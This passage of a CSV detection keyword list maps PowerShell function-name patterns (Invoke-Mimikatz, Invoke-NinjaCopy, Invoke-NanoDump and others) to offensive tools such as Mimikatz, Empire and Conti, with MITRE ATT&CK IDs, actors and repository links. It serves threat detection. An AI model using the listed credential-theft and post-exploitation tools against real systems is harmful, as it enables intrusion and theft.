-*Invoke-Mimikatz*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/g4uss47/Invoke-Mimikatz,1,1,N/A,10,1,23,6,2023-03-02T22:59:52Z,2020-09-22T16:47:19Z
-*Invoke-Mimikatz*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Invoke-Mimikatz.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-Mimikatz.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z
-*Invoke-Mimikatz.ps1*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/g4uss47/Invoke-Mimikatz,1,1,N/A,10,1,23,6,2023-03-02T22:59:52Z,2020-09-22T16:47:19Z
-*Invoke-Mimikatz-old*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*Invoke-MITM6*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-ModifiableProgramsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-MonitorCredSniper*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-MS16*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-MS16032*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - 
Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16032.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-MS16032*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1126,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-MS16135*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-MS16135.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1120,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-NamedPipePermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-NanoDump*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-NanoDump*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - 
TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-NetRipper*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-NetworkAdaptersCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege 
Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-NetworkRelay*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-Nightmare -DLL *,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-Nightmare -NewUser*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-Nightmare*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-NinjaCopy*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-NinjaCopy*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-NinjaCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-noPac.*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/Invoke-noPac,1,0,N/A,N/A,1,57,12,2023-02-16T10:45:19Z,2021-12-13T19:01:18Z -*Invoke-NTLMAuth.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-Ntsd.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Obfuscation*,offensive_tool_keyword,Invoke-Obfuscation,Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.,T1027 - T1059 - T1140,TA0002 - TA0003 - TA0040,N/A,N/A,Defense Evasion,https://github.com/danielbohannon/Invoke-Obfuscation,1,1,N/A,N/A,10,3289,733,2023-08-10T23:49:06Z,2016-09-25T03:38:02Z -*Invoke-OpenInboxFinder*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-OpenOWAMailboxInBrowser*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Invoke-OxidResolver*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Oxidresolver*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-OxidResolver*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-P0wnedshell*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-P0wnedshellx86*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into 
Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-PacketKnock*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Paranoia*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Paranoia.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Paranoia*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
